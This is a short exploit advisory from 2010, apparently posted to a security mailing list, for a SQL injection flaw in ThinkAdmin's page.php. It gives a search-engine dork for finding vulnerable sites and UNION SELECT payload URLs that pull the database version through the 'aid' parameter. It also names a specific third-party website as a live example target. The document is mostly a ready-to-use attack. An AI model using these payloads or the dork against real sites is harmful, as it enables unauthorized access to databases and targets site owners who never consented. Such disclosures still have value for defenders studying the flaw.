ThinkAdmin (page.php) Sql Injection Vulnerability ========================================================== ########################################### .:. Author : AtT4CKxT3rR0r1ST .:. Email : F.Hack@w.cn .:. Team : Sec Attack Team .:. Home : www.sec-attack.com/vb .:. Script : ThinkAdmin .:. Script Download: http://www.thinkadmin.net/ .:. Bug Type : Sql Injection[Mysql] .:. Dork : Powered by ThinkAdmin .:. Date : 30/1/2010 ############################################# ===[ Exploit ]=== www.site.com/page.php?id=21&aid=12[SQL INJECTION]&s=3 www.site.com/page.php?id=21&aid=-12'+union+select+1,version(),3,4,5,6,7,8-- -&s=3 ===[ Example ]=== http://www.chect.org.uk/page.php?id=21&aid=-12'union+select+1,version(),3,4,5,6,7,8-- -&s=3 ############################################# Greats T0: HackxBack & Zero Cold & All My Friend & All Member Sec Attack ________________________________ Your E-mail and More On-the-Go. Get Windows Live Hotmail Free. Sign up now.